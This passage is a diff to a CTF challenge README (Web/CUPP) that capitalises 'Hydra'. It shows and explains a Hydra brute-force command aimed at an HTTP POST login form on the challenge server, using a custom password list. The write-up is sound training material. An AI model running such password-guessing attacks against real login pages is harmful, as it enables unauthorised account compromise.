starkindustries/laptop-hacking-coffee/Web/CUPP/README.md

 hydra [-l LOGIN | -L FILE] [-p PASS | -P FILE] [service://server[:PORT][/OPT]]
 ```

 Assume that the username is `lucas` for this search.
-The hydra command will look like this:
+The Hydra command will look like this:
 ```
 $ hydra -l lucas -P lucas.txt "http-post-form://challenges.laptophackingcoffee.org:3199/secret.php:username=^USER^&password=^PASS^&login=Submit:failed" -V
 ```

-A few key notes about hydra's syntax:
+A few key notes about Hydra's syntax:
-* `^USER^` is a keyword hydra uses that is replaced at runtime with the data given in the `-l` or `-L` options.
+* `^USER^` is a keyword Hydra uses that is replaced at runtime with the data given in the `-l` or `-L` options.
 Likewise, `^PASS^` is a keyword replaced with the data in the `-p` or `-P` options.
 * The entire portion containing the `[service://server[:PORT][/OPT]` must be contained in double quotes (`"`).
-* The `:failed` portion towards the end of the command is what hydra looks for to check if the login failed.
+* The `:failed` portion towards the end of the command is what Hydra looks for to check if the login failed.
 The word `failed` is from Lucas's failed login page which simply says: "Login failed!"

 With all this in mind, the above command breaks down like this:
 ```
-hydra                                   run the hydra program -l lucas                                set the login (username) to lucas -P lucas.txt                            use lucas.txt as the password file http-post-form://                       use HTTP POST service
+hydra                                   run the Hydra program -l lucas                                set the login (username) to lucas -P lucas.txt                            use lucas.txt as the password file http-post-form://                       use HTTP POST service